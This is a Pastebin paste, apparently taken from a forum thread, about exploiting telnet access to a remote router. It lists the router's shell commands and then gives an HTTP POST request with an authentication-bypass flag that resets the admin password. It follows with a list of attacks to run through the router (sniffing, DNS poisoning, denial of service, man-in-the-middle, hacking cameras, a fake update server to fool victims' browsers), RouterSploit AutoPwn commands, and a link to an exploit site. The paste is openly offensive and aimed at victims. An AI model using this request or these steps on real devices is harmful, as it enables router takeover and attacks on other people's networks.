Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- what to do with access to remote router?
- So let's assume there is access to a remote router and that it is possible to TELNET him. List of supported commands are:
- list of supported commands :
- ? | exit | help
- exec < iwconfig | iwpriv | iwgetid | iwspy | iwlist | iptables | ifconfig >
- exec < route | netstat | arp | nslookup | vconfig | switch | ping >
- exec < hostname | ps | killall | kill | top | free | reboot | lsmod >
- exec < insmod | rmmod | cat | ls | head | tail | umount | mount | mkdir >
- exec < rm | proc >
- flash < default >
- all <sample>
- get <mib_name>
- set <mib_name>[ <value>]
- lan < status >
- addr <ip-address> | ?
- dhcp < ? | status | on | off >
- client [start_ip <end_ip>]
- slease < ? | status | clearall >
- add <mac_addr> <ip_addr>
- del [id]
- iptv < ? | status | disable >
- direct < 1 | 2 | 3 | 4 | 3+4 >
- vlan < 1 | 2 | 3 | 4 | 3+4 >
- voip < ? | status | disable | enable >
- route < ? | status >
- add <dest_addr|default> <gateway> [<metric>]
- del <host addr|default>
- nat < ? | status | clearall >
- add <ip addr> <server> [bcast] [protocol <from port [to port] [d...
- del <id>
- sys < atsh | status | reload | delayed | commit | reboot | log | diag >
- sys < ports >
- mode < ? | status | gateway | wisp | ap >
- update <0:disabled|1:enabled>
- apply [bridge|wan]
- manage
- access
- web <?|0:disabled|1:enabled> [port]
- icmp <?|0:disabled|1:enabled>
- telnet <?|0:disabled|1:enabled> [port]
- ping <domain_name|ip-address>
- nslookup <domain_name>
- password <password>
- service
- webface < status | start | stop >
- wan < status | none >
- link < ? | status >
- clone < ? | status | default | <mac-addr> | <ip-addr> >
- dns < ? | status | auto >
- manual [server-1 [server-2 [server-3]]]
- static <?|[ip_addr <netmask> <gateway>]>
- dhcp < ? | status | on | release | renew >
- 802.1x < ? | status | disable >
- md5 <user name> <password>
- chap <user name> <password>
- mschap <user name> <password>
- mschap2 <user name> <password>
- peap-mschap2 <user name> <password>
- upnp < ? | status | enable | disable >
- sroute < ? | status | enable | disable | clearall >
- add <ip-address> <subnet mask> <gateway>
- del <id>
- ppp < none | connect | disconnect | start | stop >
- pppoe <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
- pptp <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
- l2tp <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
- reinit < ? | status | enable | disable >
- wlan < status | ssid | rate | channel | clients | survey >
- enable < ? | status | on | off >
- band < ? | b | g | bg | n | gn | bgn >
- auth < none >
- open < wep64 | wep128 >
- shared < wep64 | wep128 >
- wpapsk < tkip | aes | tkipaes >
- wpa2psk < tkip | aes | tkipaes >
- wpapskwpa2psk < tkip | aes | tkipaes >
- What can be done remotely with such commands? Is it possible to sniff traffic or to use the router as a VPN? What would you do? Thanks
- Next we gonna post a HTTP req
- Quote:
- POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
- Host: 192.168.1.2
- Keep-Alive: 115
- Content-Type: application/x-www-form-urlencoded
- Content-length: 0
- ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&
- admin_name=admin&admin_password1=uhOHahEh
- so you are resetting the admin pass with that
- to enable or to know the telnet logins
- so what after telnet is your question
- so its simple
- #Sniffing
- #Dns Poisoning
- #Network flooding
- #Hack Network camerasa
- #Hack DMV server
- #Network DOS
- #Corrupting the IP Rooting table
- #Conducting a MIMT attack
- #Write Arp-trigger scripts which execute some functions into network if one system calls a particular function
- #Making a Fake Update server to Fool devices
- (example is if you know your victim pc has firefox )
- at the time of start everythime firefoc will check http://www.mozilla.org/en-US/plugincheck/
- for knowing any updates , you just spoof a *.update.* a wildcard update we are filling wildcard at front and end because to ensure it will be detected what ever plugins system has as you have the telnet access to the router you can do anything with the network .
- another best thing is.
- after telnet you can browse system file by just running pwd and ls -a
- $ cd /var
- but not more than var directory
- and you can do lots more but not serious damage.
- if you want further access you can exploit it by below steps
- <3 Metasploit version for routers is > RouterSploit
- Just get into Network
- RouterSploit > use /payload/AutoPwn
- RouterSploit(AutoPwn) > setg LHOST 192.168.1.1
- RouterSploit (AutoPwn)> run
- even there are lots of reversh shell exploits
- So it fucks your router all available exploits at rtrpwn server>
- if you want to exploit using the scripts directly or manually
- you can download exploits for router from here
- http://www.routerpwn.com/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement